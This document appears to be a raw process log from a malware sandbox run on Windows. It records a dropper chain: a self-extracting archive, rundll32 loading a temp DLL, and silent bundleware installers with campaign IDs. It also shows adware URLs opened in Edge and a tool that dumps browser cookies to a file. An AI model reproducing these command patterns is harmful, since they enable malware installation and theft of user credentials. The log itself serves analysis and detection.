"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4164 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6436 -ip 6436
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3972 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 7240 -ip 7240
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\is-6G1B4.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-6G1B4.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7240 -s 460
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6436 -s 276
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3312 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3312 /prefetch:8
C:\Users\Admin\Documents\TOrlUfw8Pg3PdDGgJracYWeT.exe
"C:\Users\Admin\Documents\TOrlUfw8Pg3PdDGgJracYWeT.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 460 -p 5348 -ip 5348
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xe8,0x7c,0x7ff9b03446f8,0x7ff9b0344708,0x7ff9b0344718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2F580D91C9B94D8E747EEF9E96BDB17F C
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5348 -s 2416
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4528 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0iewgqlt.0ib\GcleanerEU.exe /eufive & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\djpwzxh0.ep1\installer.exe /qn CAMPAIGN="654" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 496 -ip 496
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lwefipaf.e5g\ufgaa.exe & exit
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533762 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 2436
C:\Users\Admin\AppData\Local\Temp\djpwzxh0.ep1\installer.exe
C:\Users\Admin\AppData\Local\Temp\djpwzxh0.ep1\installer.exe /qn CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\0iewgqlt.0ib\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\0iewgqlt.0ib\GcleanerEU.exe /eufive
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6896 -ip 6896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 280
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uesb3quz.ihb\anyname.exe & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\uesb3quz.ihb\anyname.exe
C:\Users\Admin\AppData\Local\Temp\uesb3quz.ihb\anyname.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c3l35rfu.hyn\gcleaner.exe /mixfive & exit
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\uesb3quz.ihb\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\uesb3quz.ihb\anyname.exe" -q
C:\Users\Admin\AppData\Local\Temp\c3l35rfu.hyn\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\c3l35rfu.hyn\gcleaner.exe /mixfive
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 8804 -ip 8804
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8804 -s 60
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 8584 -ip 8584
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8584 -s 452
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yblew45k.5ik\autosubplayer.exe /S & exit
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6316 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5660 /prefetch:2
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2872 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1892 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_18F4.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1cc,0x210,0x7ff9c7e1dec0,0x7ff9c7e1ded0,0x7ff9c7e1dee0
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --mojo-platform-channel-handle=1824 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1772 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --mojo-platform-channel-handle=2192 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2384 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2356 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --mojo-platform-channel-handle=3208 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3248 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --mojo-platform-channel-handle=3456 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --mojo-platform-channel-handle=3564 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3048 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --mojo-platform-channel-handle=3628 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1756,17558360290040873272,10938693220089264714,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6820_577570517" --mojo-platform-channel-handle=3552 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xdc,0x110,0x7ff9b03446f8,0x7ff9b0344708,0x7ff9b0344718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6360 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9b03446f8,0x7ff9b0344708,0x7ff9b0344718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,7835602596446496014,6210179210880140717,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
